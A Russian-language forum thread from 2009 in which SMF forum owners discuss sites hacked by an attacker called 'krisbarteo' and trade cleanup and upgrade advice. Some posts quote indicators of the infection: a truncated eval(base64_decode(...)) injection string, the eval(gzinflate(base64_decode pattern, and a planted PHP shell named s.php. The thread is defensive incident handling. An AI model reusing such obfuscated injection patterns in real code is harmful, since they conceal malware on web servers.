94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/classic/BoardIndex.template.php (main_below sub template - eval?)
Строка: 298
? 	15 Май 2009, 13:19:34

и что это значит?

moskovets · 25 мая 2009, 18:15:55

это значит, что твой пользователь (которого ты так и не удалил) буйствовал, ищи баги в файлах /Themes/default/Themes.template.php; /Themes/default/languages/Who.russian.php; /Themes/classic/BoardIndex.template.php; и /Sources/Themes.php по соответствующим строкам или просто грохни и замени с дистрибутива, я так понял что в /Themes/classic/BoardIndex.template.php ты сам что то менял раз используеш эту тему, то просто пересмотри/сровни с файлом из дистриба.

И грохни наконец то того пользователя

andrey1cov · 26 мая 2009, 11:09:33

предыдущие советы не помогли к сожалению

после копирования и замены Large Upgrade - форум обновился но сообщает об ошибке базы данных при просмотре тем, говорит что форум 1.1.9 а база MySQL 1.2

пришлось всё вернуть как было из бэкапа

digger® · 26 мая 2009, 13:21:13

Цитата: andrey1cov от 26 мая 2009, 11:09:33
после копирования и замены Large Upgrade - форум обновился но сообщает об ошибке базы данных при просмотре тем, говорит что форум 1.1.9 а база MySQL 1.2

Что значит "копирования и замены Large Upgrade"? Вы upgrade.php запускали?

andrey1cov · 26 мая 2009, 13:25:04

ЦитироватьЧто значит "копирования и замены Large Upgrade"? Вы upgrade.php запускали?

нет,
я думал просто надо заменить

надо заменить файлами из обновления и запустить upgrade.php?

OstLand · 26 мая 2009, 14:57:34

Цитата: andrey1cov от 26 мая 2009, 13:25:04
надо заменить файлами из обновления и запустить upgrade.php?

Да, скрипт должен полностью отработать все шаги.

moskovets · 26 мая 2009, 20:49:50

письмо пришло

Цитировать
Simple Machines announces the release of SMF 1.1.9 and 2.0 RC1-1, addressing a few vulnerabilities found in SMF 1.1.8 and 2.0 RC1. We strongly recommend that all users upgrade as soon as possible.

It should be noted that SMF 2.0 RC1-1 is not the second release candidate for SMF 2.0, but merely a security-updated version of the first release candidate. The new Curve theme is still scheduled for SMF 2.0 RC2, as announced earlier.

To upgrade, use the package manager to upgrade to either 1.1.9 or 2.0 RC1-1, depending on your version. Simply visit your administration center, where a notice will be displayed, prompting you to upgrade. Click the link, confirm the changes and your __forum will be up to date again. Users still running the SMF 1.0.x branch can upgrade to SMF 1.0.17 via the same procedure.

If you cannot upgrade using the package manager, please follow the instructions posted in the Online Manual about installing and upgrading. If you experience a session verification error when inputting FTP details for updating process, please see this topic.

It may be necessary to apply the upgrade manually if mod conflicts mean that you cannot install the patch through the package manager. Instructions for doing this can be found on this page for all versions.

Finally - please do not use this topic for any support requests. You will get a much more prompt response by visiting the relevant support board!

Regards,
Simple Machines

digg_url = 'http://digg.com/software/SMF_1_1_9_and_2_0_RC1_1_released';

To unsubscribe from these announcements, login to the __forum and uncheck "Receive __forum announcements and important notifications by email." in your profile.

You can view the full announcement by following this link:
http://www.simplemachines.org/community/index.php?topic=311899.0

Regards,
The Simple Machines Community __forum Team.

если хто инглицкого не знает - в гугле есть карявенький переводчиг

digger® · 26 мая 2009, 20:58:08

Цитата: moskovets от 26 мая 2009, 20:49:50
письмо пришло

если хто инглицкого не знает - в гугле есть карявенький переводчиг

"если хто инглицкого не знает" - может прочитать Выпущены SMF 1.1.9 и 2.0 RC1-1

moskovets · 26 мая 2009, 21:31:47

офтоп: 2digger кросафчеГ

sb1982-2 · 28 мая 2009, 15:37:13

привет. поставил обновление, но вчера снова заломали. Ребят, кому не сложно - помогите, у нас некоммерческий медицинский проект-люди реально волнуются, не можем справиться сами
forum.antivsd.ru - icq моя 388113454

andrey1cov · 29 мая 2009, 12:32:35

ЦитироватьДа, скрипт должен полностью отработать все шаги.

всё получилось спасибо за помощь! были небольшие ошибки с языковым пакетом, переключил на английский и заново обновил всё ок!

Да, скрипт должен полностью отработать все шаги.

Цитироватьпоставил обновление, но вчера снова заломали

а как это выразилось?

Моника · 08 июня 2009, 00:11:55

Я в шоке этот krisbarteo у меня тоже буянил $:-\$ Но вроде не долго

sofree · 09 июня 2009, 09:25:01

Буянит он постоянно, пока его не вычистишь. Не забудьте, krisbarteo оставляет php shell - s.php, - даже если вы его внедрённый код удалите из своих файлов, - то оставленным шеллом можно будет такое натворить!..
Попробуйте прогнать свой сайт скриптом krisbarteo remover:
http://__gituha.ru/other/krisbarteo_remover/

Mavn · 09 июня 2009, 13:50:11

Хм лучше уж с офф сайт тулсу пользовать
http://www.simplemachines.org/community/index.php?topic=313201.0

sofree · 09 июня 2009, 14:37:25

Спасибо, надо будет и этот скриптец попробовать.

Вот впечатление. Заливать надо в каталог с форумом.

Цитировать# Upload the attached file to your forum's directory (alongside SSI.php and index.php)

Т.е. по умолчанию "весь" сайт не проверяется. Для проверки всего сайта, нужно залить в корень сайта и поправить немного kb_scan.php.
Я посмотрел исходник - скрипт пропускает файлы, в которых код закодирован так:

Цитироватьeval(gzinflate(base64_decode

ich · 14 октября 2009, 17:59:45

Цитата: Alder от 18 мая 2009, 15:28:50
Если я верно понимаю по описанию, то у меня тоже аналогично был заражен форум. Определяется это наличием в начале каждого php-файла в папке Sources строки вида <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ....
После декодирования строки были обнаружены ссылки на файл /Themes/default/images/icons/style.css.php. Рядом были найдены еще левые скрипты и около 800 файлов с рекламным содержанием. Чистить пришлось много и долго. Сейчас вроде все ок.

у меня сегодня на форуме то же самое... так как же бороться? вручную проверять все файлы? или есть другой выход?

kb_scan.php ничего не меняет :

Fatal error: Cannot redeclare m8zz() (previously declared in c:\domains\...\wwwroot\forum\Sources\QueryString.php(1) : eval()'d code:1) in c:\domains\...\wwwroot\forum\Sources\Load.php(1730) : eval()'d code(1) : eval()'d code on line 1

Mavn · 14 октября 2009, 20:22:15

сноси все файлы и заливай заново заодно обновишь до последней версии. предварительно делаешь бэкап

ich · 14 октября 2009, 20:32:42

Цитата: Mavn от 14 октября 2009, 20:22:15
сноси все файлы и заливай заново заодно обновишь до последней версии. предварительно делаешь бэкап

какой бэкап!!! на форум зайти нет возможности!!!

других предложений нет???

Mavn · 14 октября 2009, 20:39:35

ну так еперный театр а фтп на что дан, для того чтобы любоваться им? для того чтобы сделать бэкап вообще не обязательно форум для этого использовать

ich · 14 октября 2009, 20:45:18

простите за тупость... я просто в панике... объяснить можно подробнее для новичков?

Mavn · 15 октября 2009, 10:08:23

перекачиваешь все файлы по фтп себе на комп грохаешь все файлы на серваке заменяешь свежими скаченным с офф сайта если требуется обновление бд то обновляешь. вложения и аватары закаченные последними грохаешь ибо есть вероятность того что там есть тоже зловредный код.

ich · 15 октября 2009, 16:24:20

почистили файлы...но все равно пишет:

Fatal error: Cannot redeclare y2dl() (previously declared in c:\domains\...\wwwroot\forum\Sources\Load.php(1730) : eval()'d code(1) : eval()'d code:1) in c:\domains\...\wwwroot\forum\Sources\Load.php(1730) : eval()'d code(1) : eval()'d code on line 1

кто-нибудь знает что это означает?

Mavn · 15 октября 2009, 16:26:42

если бы сделали так как сказал то не вылазило бы!

ich · 15 октября 2009, 18:07:38

блин, хотелось как лучше, а получилось как всегда...пересмотрела все файлы, удалила код, но видно что-то осталось...

Цитата: Mavn от 15 октября 2009, 10:08:23
перекачиваешь все файлы по фтп себе на комп грохаешь все файлы на серваке заменяешь свежими скаченным с офф сайта если требуется обновление бд то обновляешь. вложения и аватары закаченные последними грохаешь ибо есть вероятность того что там есть тоже зловредный код.

это что же, заново форум устанавливать?

Mavn · 15 октября 2009, 18:29:15

перезалить файлы и переустановить форум это разные вещи!!!